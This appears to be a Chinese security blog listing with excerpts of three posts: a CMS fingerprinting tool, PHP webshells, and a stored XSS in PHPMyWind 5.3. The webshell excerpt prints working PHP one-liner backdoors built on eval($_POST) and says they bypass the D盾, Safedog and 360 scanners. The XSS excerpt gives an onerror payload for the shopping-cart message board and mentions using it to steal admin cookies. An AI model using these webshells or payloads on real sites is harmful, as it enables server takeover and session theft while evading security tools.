cms指纹识别

无意看到这篇文章 https://forum.90sec.org/forum.php?mod=viewthread&tid=9803 感觉重复造轮子了。。。。。。。。 所以还是发出来吧! 首先看下界面吧 提交任务: Lib和static目录均是框架自带的.css和.js文件 Include目录下config.inc.php数据库配置文件 Sql文件打包,自行修改 登录账号baozi/baozi123   ……

过D盾,安全狗,一句话

其他waf 杀毒软件自己测试,我只测试了D盾,安全狗,360 D盾,360 <?php $a ="www.yuag.com"; function yuag($a){ eval($a); } @ yuag($_POST['yuag']); 密码:yuag 过D盾过安全狗 <?php error_reporting(0); $b="zxczxczxczxczxcxzczx"; function yuag_array($b,$c){ $b=strrev($b); print "www.yuag.……

phpmywind_5-3存储型xss

http://127.0.0.1/PHPMyWind_5.3/shoppingcart.php 留言板地址 以ing开头(可以是其他) “><img/src=x onerror=alert(2001)><“‘ 后台 127.0.0.1/PHPMyWind_5.3/admin/message.php 需要点击修改才可以弹XSS 如果管理员留言需要前台显示(或者回复)就必须点击修改。 ps:如果想打管理员cookie 就这个构造……